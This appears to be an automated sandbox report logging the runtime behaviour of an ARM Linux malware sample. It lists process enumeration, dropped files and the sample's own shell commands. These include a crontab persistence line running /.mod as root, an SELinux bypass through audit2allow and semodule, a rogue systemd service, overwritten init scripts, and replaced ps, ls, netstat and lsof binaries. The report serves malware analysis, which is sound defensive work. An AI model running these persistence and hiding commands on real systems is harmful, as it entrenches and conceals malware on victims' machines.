              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/21/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/807/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/928/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/22/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/23/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/24/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/25/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/26/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/27/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/28/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/29/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/3420/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/490/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/250/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/130/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/251/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/131/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/252/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/132/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/253/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/254/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/255/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/135/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/256/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/1599/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/257/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/378/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/258/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/3412/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/259/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/30/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/35/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/1371/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/260/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/261/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/262/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5501)Shell command executed: /bin/bash -c /etc/32675&Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5522)Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5575)Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5583)Shell command executed: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"Jump to behavior
              Source: /usr/sbin/cron (PID: 5694)Shell command executed: /bin/sh -c "/.mod "Jump to behavior
              Source: /usr/sbin/cron (PID: 5759)Shell command executed: /bin/sh -c "/.mod "Jump to behavior
              Source: /usr/sbin/service (PID: 5507)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5512)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
              Source: /usr/sbin/service (PID: 5514)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
              Source: /bin/bash (PID: 5528)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
              Source: /bin/bash (PID: 5532)Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaoff.serviceJump to behavior
              Source: /bin/bash (PID: 5538)Systemctl executable: /usr/bin/systemctl -> systemctl start quotaoff.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5645)Systemctl executable: /usr/bin/systemctl -> systemctl start cron.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5652)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
              Source: /usr/sbin/service (PID: 5654)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5671)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/32675 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /boot/System.mod (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/lib/libgdi.so.0.8.1 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/lib/system-mark (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/ps (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/ss (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/ls (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/dir (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/netstat (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/find (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/lsof (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/ps (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/ss (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/ls (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/dir (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/netstat (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/find (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/lsof (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /etc/opt.services.cfgJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /boot/System.modJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /etc/profile.d/bash_cfgJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/lib/libgdi.so.0.8.1Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/lib/system-markJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/psJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/ssJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/lsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/dirJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/netstatJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/findJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/lsofJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/psJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/ssJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/lsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/dirJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/netstatJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/findJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/lsofJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/32675Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /.modJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/acpidJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utilsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/anacronJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmorJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/apportJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemonJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-supportJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetoothJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/cronJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisksJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-earlyJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/cupsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsedJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/dbusJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtempJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalanceJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsidJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/kmodJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdmJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensorsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolldJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-toolsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsiJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-toolsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouthJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-logJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/procpsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyncJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslogJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/sanedJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanupJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagentJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/sshJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/udevJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/ufwJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgradesJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/uuiddJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-commonJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Shell script file created: /etc/profile.d/bash_cfg.shJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Shell script file created: /etc/init.d/console-setup.shJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Shell script file created: /etc/init.d/hwclock.shJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Shell script file created: /etc/init.d/keyboard-setup.shJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Shell script file created: /etc/profile.d/gateway.shJump to dropped file
              Source: /usr/sbin/service (PID: 5515)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
              Source: /usr/sbin/service (PID: 5655)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Drops files in suspicious directories
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/acpidJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/alsa-utilsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/anacronJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/apparmorJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/apportJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/avahi-daemonJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/binfmt-supportJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/bluetoothJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/console-setup.shJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/cronJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/cryptdisksJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/cryptdisks-earlyJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/cupsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/cups-browsedJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/dbusJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/gdm3Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/hddtempJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/hwclock.shJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/irqbalanceJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/iscsidJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/keyboard-setup.shJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/kmodJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/lightdmJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/lm-sensorsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/lvm2-lvmpolldJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/mono-xsp4Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/multipath-toolsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/open-iscsiJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/open-vm-toolsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/plymouthJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/plymouth-logJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/procpsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/rsyncJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/rsyslogJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/sanedJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/screen-cleanupJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/spice-vdagentJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/sshJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/udevJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/ufwJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/unattended-upgradesJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/uuiddJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/init.d/x11-commonJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/psJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/ssJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/lsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/dirJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/netstatJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/findJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/lsofJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/psJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/ssJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/lsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/dirJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/netstatJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/findJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/lsofJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Path: /usr/bin/include/psJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Path: /usr/bin/include/ssJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Path: /usr/bin/include/lsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Path: /usr/bin/include/netstatJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Path: /usr/bin/include/lsofJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Path: /usr/bin/psJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Path: /usr/bin/ssJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Path: /usr/bin/lsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Path: /usr/bin/netstatJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Path: /usr/bin/lsofJump to dropped file
              Source: /etc/32675 (PID: 5509)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
              Source: /etc/32675 (PID: 5731)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
              Source: /usr/bin/sleep (PID: 5509)Sleeps longer then 60s: 60.0sJump to behavior
              Source: /usr/bin/sleep (PID: 5731)Sleeps longer then 60s: 60.0sJump to behavior
              Source: /usr/sbin/cron (PID: 5670)Sleeps longer then 60s: 60.0sJump to behavior
              Source: /usr/sbin/cron (PID: 5716)Sleeps longer then 60s: 60.0sJump to behavior
              Source: /usr/sbin/cron (PID: 5716)Sleeps longer then 60s: 60.0sJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5483)Queries kernel information via 'uname': Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)Queries kernel information via 'uname': Jump to behavior
              Source: /bin/bash (PID: 5501)Queries kernel information via 'uname': Jump to behavior
              Source: /etc/32675 (PID: 5506)Queries kernel information via 'uname': Jump to behavior
              Source: /etc/opt.services.cfg (PID: 5723)Queries kernel information via 'uname': Jump to behavior
              Source: /etc/opt.services.cfg (PID: 5728)Queries kernel information via 'uname': Jump to behavior
              Source: /bin/bash (PID: 5522)Queries kernel information via 'uname': Jump to behavior
              Source: /bin/bash (PID: 5575)Queries kernel information via 'uname': Jump to behavior
              Source: /bin/bash (PID: 5583)Queries kernel information via 'uname': Jump to behavior
              Source: /boot/System.mod (PID: 5539)Queries kernel information via 'uname': Jump to behavior
              Source: /boot/System.mod (PID: 5555)Queries kernel information via 'uname': Jump to behavior
              Source: /boot/System.mod (PID: 5566)Queries kernel information via 'uname': Jump to behavior
              Source: /.mod (PID: 5695)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5696)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5701)Queries kernel information via 'uname': Jump to behavior
              Source: /.mod (PID: 5760)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5761)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766)Queries kernel information via 'uname': Jump to behavior
              Source: System.mod, 5555.1.00007fff780cd000.00007fff780ee000.rw-.sdmpBinary or memory string: hx86_64/usr/bin/qemu-arm/boot/System.mod
              Source: System.mod, 5571.1.00007ffd0795f000.00007ffd07980000.rw-.sdmpBinary or memory string: =Px86_64/usr/bin/qemu-arm/boot/System.mod
              Source: .mod, 5696.1.00007ffc409b5000.00007ffc409d6000.rw-.sdmp, libgdi.so.0.8.1, 5696.1.00007ffc409b5000.00007ffc409d6000.rw-.sdmp, .mod, 5761.1.00007ffd64f77000.00007ffd64f98000.rw-.sdmp, libgdi.so.0.8.1, 5761.1.00007ffd64f77000.00007ffd64f98000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/usr/lib/libgdi.so.0.8.1SHELL=/bin/shPWD=/rootLOGNAME=rootHOME=/rootLANG=en_US.UTF-8SHLVL=1PATH=/usr/bin:/bin_=/usr/lib/libgdi.so.0.8.1/usr/lib/libgdi.so.0.8.1
              Source: libgdi.so.0.8.1, 5766.1.000055dc9f671000.000055dc9fca8000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt
              Source: System.mod, 5555.1.000056216e548000.000056216eb73000.rw-.sdmpBinary or memory string: Un!VGeneralName!/etc/qemu-binfmt/arm
              Source: libgdi.so.0.8.1, 5701.1.0000564ae6bec000.0000564ae7220000.rw-.sdmpBinary or memory string: JV!/etc/qemu-binfmt/arm
              Source: open-vm-tools.14.drBinary or memory string: rm -f /var/run/vmtoolsd.pid
              Source: libgdi.so.0.8.1, 5766.1.000055dc9f671000.000055dc9fca8000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
              Source: System.mod, 5555.1.000056216e548000.000056216eb73000.rw-.sdmpBinary or memory string: Tn!Vrg.qemu.gdb.arm.sys.regs">
              Source: systemd, 5539.1.00007fffce7b9000.00007fffce7da000.rw-.sdmp, System.mod, 5539.1.00007fffce7b9000.00007fffce7da000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/boot/System.modLANG=en_US.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binINVOCATION_ID=0fc38d058b1e40c5b3ac4fb528025dddJOURNAL_STREAM=9:65821/boot/System.mod
              Source: systemd, 5539.1.000055651cbb0000.000055651d2a1000.rw-.sdmp, System.mod, 5539.1.000055651cbb0000.000055651d2a1000.rw-.sdmpBinary or memory string: eUrg.qemu.gdb.arm.sys.regs">
              Source: open-vm-tools.14.drBinary or memory string: checktool='vmware-checkvm'
              Source: libgdi.so.0.8.1, 5766.1.000055dc9f671000.000055dc9fca8000.rw-.sdmpBinary or memory string: Urg.qemu.gdb.arm.sys.regs">
              Source: systemd, 5539.1.000055651cbb0000.000055651d2a1000.rw-.sdmp, System.mod, 5539.1.000055651cbb0000.000055651d2a1000.rw-.sdmpBinary or memory string: eUGeneralName!/etc/qemu-binfmt/arm
              Source: libgdi.so.0.8.1, 5701.1.00007f6030000000.00007f60300b3000.rw-.sdmpBinary or memory string: .qemu.gdb.arm.sys.regs"><reg name="AMAIR0_S" bitsize="32" group="cp_regs"/><reg name="AFSR0_EL1" bitsize="32" group="cp_regs"/><reg name="AMAIR1_S" bits
              Source: open-vm-tools.14.drBinary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
              Source: libgdi.so.0.8.1, 5766.1.00007f9460000000.00007f94600b3000.rw-.sdmp, libgdi.so.0.8.1, 5766.1.000055dc9f671000.000055dc9fca8000.rw-.sdmpBinary or memory string: rg.qemu.gdb.arm.sys.regs">
              Source: linux_arm6.elf, 5483.1.00007fffc6027000.00007fffc6048000.rw-.sdmpBinary or memory string: +x86_64/usr/bin/qemu-arm/tmp/linux_arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/linux_arm6.elf
              Source: open-vm-tools.14.drBinary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 || exit $?
              Source: open-vm-tools.14.drBinary or memory string: # Check if we're running inside VMWare
              Source: open-vm-tools.14.drBinary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null || exit 1
              Source: open-vm-tools.14.drBinary or memory string: if ! ${checktool} | grep -iq vmware; then
              Source: libgdi.so.0.8.1, 5701.1.0000564ae6bec000.0000564ae7220000.rw-.sdmpBinary or memory string: JVrg.qemu.gdb.arm.sys.regs">
